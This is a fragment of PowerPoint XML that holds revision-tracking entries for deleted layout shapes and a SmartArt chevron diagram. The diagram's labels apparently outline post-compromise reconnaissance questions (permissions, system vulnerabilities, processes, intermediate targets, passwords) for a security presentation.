          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:17.351" v="257" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="1899143239" sldId="2147483750"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:16.886" v="256" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1899143239" sldId="2147483750"/>
              <ac:spMk id="12" creationId="{F80D2814-8536-D34E-9A51-F250DEB4F82C}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:17.351" v="257" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1899143239" sldId="2147483750"/>
              <ac:picMk id="7" creationId="{CB7C18C8-DB61-4BC6-8ECE-0A8290898980}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:19.612" v="259" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="1003666336" sldId="2147483751"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:18.779" v="258" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1003666336" sldId="2147483751"/>
              <ac:spMk id="26" creationId="{3051A866-DE6C-844B-BBB6-8FAE73A09746}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:19.612" v="259" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1003666336" sldId="2147483751"/>
              <ac:picMk id="20" creationId="{EE91E640-6B77-4909-B48E-5B059D96CC3C}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:21.798" v="261" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="2894596486" sldId="2147483752"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:21.306" v="260" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="2894596486" sldId="2147483752"/>
              <ac:spMk id="3" creationId="{21B0DA7E-7A13-4EE5-BADC-D0CF8CE649D8}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:21.798" v="261" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="2894596486" sldId="2147483752"/>
              <ac:picMk id="26" creationId="{9766B3B9-C0CA-48C8-A174-231AFCFFC4DD}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:23.270" v="263" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="908272710" sldId="2147483753"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:22.888" v="262" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="908272710" sldId="2147483753"/>
              <ac:spMk id="16" creationId="{A87593FF-48B4-A049-84B0-C3D11BE77E35}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:23.270" v="263" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="908272710" sldId="2147483753"/>
              <ac:picMk id="9" creationId="{B6F752EB-8900-4CA9-A248-6B0738211029}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:25.205" v="265" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="248000941" sldId="2147483754"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:24.821" v="264" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="248000941" sldId="2147483754"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:25.205" v="265" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="248000941" sldId="2147483754"/>
              <ac:picMk id="9" creationId="{835306B6-A974-4CBD-9CED-8D7F7CF5528C}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:28.240" v="267" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="3368661662" sldId="2147483755"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:27.645" v="266" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3368661662" sldId="2147483755"/>
              <ac:spMk id="2" creationId="{FBBA225B-0116-4A98-9C1B-A993A2C29B5D}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:28.240" v="267" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3368661662" sldId="2147483755"/>
              <ac:picMk id="5" creationId="{4395E626-2FA1-4C00-BA38-05B43AD55658}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:33.308" v="273" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:32.527" v="272" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:spMk id="16" creationId="{A5583B77-0D77-A34E-8283-81275F3E9415}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:32.527" v="272" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:spMk id="17" creationId="{8CF98308-AFBC-E14C-A180-1231217F1E6E}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:30.910" v="271" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:spMk id="18" creationId="{D717D3CB-D2D4-6A49-BA33-1E044F035217}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:32.527" v="272" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:spMk id="19" creationId="{C2210306-A808-2E4A-B31D-FFC4F65B2EF7}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:29.151" v="268" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:spMk id="38" creationId="{B75CEDAF-9B35-B244-BDC3-8E25466DD827}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:30.605" v="270" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:picMk id="7" creationId="{6AE61F59-87BC-46CF-ACD2-A5D8D7179692}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:30.402" v="269" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:picMk id="9" creationId="{D724F2F8-7DF9-4976-8E58-33CADC3485A7}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:33.308" v="273" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3889932010" sldId="2147483756"/>
              <ac:picMk id="11" creationId="{197662BA-51FE-4239-84D9-1379E66E8DA2}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:35.015" v="275" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="3141189850" sldId="2147483757"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:34.373" v="274" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3141189850" sldId="2147483757"/>
              <ac:spMk id="15" creationId="{A44DACC2-93A9-8B49-B474-85CD89E8D68F}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:35.015" v="275" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="3141189850" sldId="2147483757"/>
              <ac:picMk id="16" creationId="{E2778E7C-0D3D-4C4D-A654-01C6F5B05609}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:37.416" v="277" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="1328858376" sldId="2147483758"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:36.557" v="276" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1328858376" sldId="2147483758"/>
              <ac:spMk id="12" creationId="{F80D2814-8536-D34E-9A51-F250DEB4F82C}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:37.416" v="277" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1328858376" sldId="2147483758"/>
              <ac:picMk id="7" creationId="{32873DA4-0303-2D45-9BCE-792A64D46E3B}"/>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045124-A806-4D01-88BC-820E9AC6F89D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful3" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Who am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(permissions)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFF1800A-A716-4219-82BE-2964DD34B8A4}" type="parTrans" cxnId="{CFC32204-12C2-4D24-8708-01FC784DB789}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A915BFA6-0B4A-43D0-8DE4-1FBC6697BA7E}" type="sibTrans" cxnId="{CFC32204-12C2-4D24-8708-01FC784DB789}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Where am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(system vulns)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1E4257A-FCED-4906-8B3D-0B2286D8EC63}" type="parTrans" cxnId="{B0B07505-007E-440F-8D65-C735F2B24E4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{133087C4-2CDD-4384-9683-AC20C3B27779}" type="sibTrans" cxnId="{B0B07505-007E-440F-8D65-C735F2B24E4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>What’s going on?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(processes)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C4FC3C0-820C-4F43-B834-ABE4A64258C7}" type="parTrans" cxnId="{B553B68A-C86B-4B11-85F5-28BC7DD3B7B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24186794-EDA7-4270-8463-3E82FB5FA43B}" type="sibTrans" cxnId="{B553B68A-C86B-4B11-85F5-28BC7DD3B7B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFC975DB-2264-420D-8DE4-81CA93D4B366}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Am I alone?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(intermediate targets)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FC81E92-D00B-48D4-A11B-28674C934CA3}" type="parTrans" cxnId="{C0501FFF-2C71-4D7E-8543-1E08EAE3817A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E088592C-C90C-4480-938D-EA0B9D8F5F64}" type="sibTrans" cxnId="{C0501FFF-2C71-4D7E-8543-1E08EAE3817A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>What’s in my pocket?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(passwords, other info)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17E0A448-6A90-4944-B22A-931692E6991D}" type="parTrans" cxnId="{329E938A-FEB3-494D-946E-4BC4BEEEC2F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CCEB6F4-0B4B-4DE1-9574-1B13A5FBCB12}" type="sibTrans" cxnId="{329E938A-FEB3-494D-946E-4BC4BEEEC2F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" type="pres">
      <dgm:prSet presAssocID="{A4045124-A806-4D01-88BC-820E9AC6F89D}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19500FD1-F073-4B16-805E-CC99C4EBA2F8}" type="pres">
      <dgm:prSet presAssocID="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63FE44D6-14D0-4D06-AA89-6202D7BAC738}" type="pres">
      <dgm:prSet presAssocID="{A915BFA6-0B4A-43D0-8DE4-1FBC6697BA7E}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}" type="pres">
      <dgm:prSet presAssocID="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{798A5003-3869-4F46-BFAB-513237529333}" type="pres">
      <dgm:prSet presAssocID="{133087C4-2CDD-4384-9683-AC20C3B27779}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}" type="pres">
      <dgm:prSet presAssocID="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0B0DA5D-0376-4363-BBC0-F75BD319350F}" type="pres">
      <dgm:prSet presAssocID="{24186794-EDA7-4270-8463-3E82FB5FA43B}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{154D5D72-A51F-482D-8C93-E923C883F49B}" type="pres">
      <dgm:prSet presAssocID="{DFC975DB-2264-420D-8DE4-81CA93D4B366}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BB85132-1728-463A-8FB5-7ACC8D41CB1E}" type="pres">
      <dgm:prSet presAssocID="{E088592C-C90C-4480-938D-EA0B9D8F5F64}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
